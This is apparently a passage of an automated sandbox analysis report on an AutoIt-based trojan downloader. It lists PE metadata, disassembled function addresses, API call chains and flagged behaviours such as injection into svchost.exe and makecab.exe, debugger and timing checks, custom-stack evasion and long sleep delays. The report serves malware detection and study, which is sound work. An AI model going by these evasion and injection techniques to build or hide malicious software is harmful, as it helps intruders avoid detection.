            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: makecab.pdbGCTL source: svchost.exe, 00000001.00000003.1952888154.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1952748219.000000000322C000.00000004.00000020.00020000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000005.00000002.4100007794.0000000000C48000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rULxYvbAFLatPN.exe, 00000005.00000000.1905502256.00000000002BE000.00000002.00000001.01000000.00000005.sdmp, rULxYvbAFLatPN.exe, 00000007.00000000.2054148696.00000000002BE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1658047056.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1656804826.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1984342146.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1890105998.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1984342146.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1891740698.0000000003600000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.1986389110.00000000044F0000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.1984146113.0000000004346000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101017496.000000000483E000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101017496.00000000046A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1658047056.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1656804826.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1984342146.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1890105998.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1984342146.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1891740698.0000000003600000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, makecab.exe, 00000006.00000003.1986389110.00000000044F0000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.1984146113.0000000004346000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101017496.000000000483E000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101017496.00000000046A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: makecab.pdb source: svchost.exe, 00000001.00000003.1952888154.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1952748219.000000000322C000.00000004.00000020.00020000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000005.00000002.4100007794.0000000000C48000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: makecab.exe, 00000006.00000002.4099520220.0000000002923000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101618826.0000000004CCC000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2273797702.00000000237AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: makecab.exe, 00000006.00000002.4099520220.0000000002923000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101618826.0000000004CCC000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2273797702.00000000237AC000.00000004.80000000.00040000.00000000.sdmp
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008FC304 LoadLibraryA,GetProcAddress,0_2_008FC304
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008E8719 push FFFFFF8Bh; iretd 0_2_008E871B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008AE94F push edi; ret 0_2_008AE951
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008AEA68 push esi; ret 0_2_008AEA6A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008A8B85 push ecx; ret 0_2_008A8B98
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008AEC43 push esi; ret 0_2_008AEC45
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008AED2C push edi; ret 0_2_008AED2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414072 push 11A0082Fh; ret 1_2_00414077
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402031 push ebx; iretd 1_2_00402032
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004168C4 push eax; iretd 1_2_004168CA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004018DA push edx; ret 1_2_004018E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040229D push ebx; iretd 1_2_004022A1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041432E push 0000001Ch; retf 1_2_00414332
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412461 push es; retf 1_2_0041248A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412413 push es; retf 1_2_0041248A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413CD5 push es; retf 1_2_00413D54
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413CE1 push es; retf 1_2_00413D54
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413C86 push es; retf 1_2_00413D54
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403540 push eax; ret 1_2_00403542
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413D55 push es; retf 1_2_00413D54
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004075D2 push eax; retf 1_2_004075D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413D84 push es; retf 1_2_00413D54
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00404DA7 push ebx; iretd 1_2_00404DA8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004125B3 push ss; ret 1_2_004125C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401ED6 push ss; retf 1_2_00401EF1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401EBA push ebx; iretd 1_2_00401EBB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401795 push ebx; iretd 1_2_00401797
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380225F pushad ; ret 1_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038027FA pushad ; ret 1_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038309AD push ecx; mov dword ptr [esp], ecx1_2_038309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380283D push eax; iretd 1_2_03802858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03801368 push eax; iretd 1_2_03801369
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_00884A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00884A35
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_009055FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_009055FD
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008A33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008A33C7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeAPI/Special instruction interceptor: Address: 1103274
            Source: C:\Windows\SysWOW64\makecab.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\makecab.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\makecab.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\makecab.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\makecab.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\makecab.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\makecab.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\makecab.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E rdtsc 1_2_0387096E
            Source: C:\Windows\SysWOW64\makecab.exeWindow / User API: threadDelayed 9843Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-100079
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
            Source: C:\Windows\SysWOW64\makecab.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\makecab.exe TID: 7704Thread sleep count: 128 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\makecab.exe TID: 7704Thread sleep time: -256000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exe TID: 7704Thread sleep count: 9843 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\makecab.exe TID: 7704Thread sleep time: -19686000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe TID: 7716Thread sleep time: -80000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe TID: 7716Thread sleep time: -41000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe TID: 7716Thread sleep time: -55500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\makecab.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008E4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_008E4696
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_008EC9C7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008EC93C FindFirstFileW,FindClose,0_2_008EC93C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008EF200
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008EF35D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008EF65E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008E3A2B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008E3D4E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008EBF27
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0282BEF0 FindFirstFileW,FindNextFileW,FindClose,6_2_0282BEF0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_00884AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00884AFE
            Source: makecab.exe, 00000006.00000002.4099520220.0000000002923000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2275131882.0000027CE36AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: rULxYvbAFLatPN.exe, 00000007.00000002.4100135387.0000000000839000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeAPI call chain: ExitProcess graph end nodegraph_0-98811
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E rdtsc 1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417A63 LdrLoadDll,1_2_00417A63
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008F41FD BlockInput,0_2_008F41FD
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_00883B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00883B4C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008B5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_008B5CCC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008FC304 LoadLibraryA,GetProcAddress,0_2_008FC304
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_01103540 mov eax, dword ptr fs:[00000030h]0_2_01103540
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_011034E0 mov eax, dword ptr fs:[00000030h]0_2_011034E0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_01101E70 mov eax, dword ptr fs:[00000030h]0_2_01101E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385438F mov eax, dword ptr fs:[00000030h]1_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385438F mov eax, dword ptr fs:[00000030h]1_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EC3CD mov eax, dword ptr fs:[00000030h]1_2_038EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B63C0 mov eax, dword ptr fs:[00000030h]1_2_038B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov ecx, dword ptr fs:[00000030h]1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h]1_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h]1_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038663FF mov eax, dword ptr fs:[00000030h]1_2_038663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C310 mov ecx, dword ptr fs:[00000030h]1_2_0382C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850310 mov ecx, dword ptr fs:[00000030h]1_2_03850310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov ecx, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov ecx, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
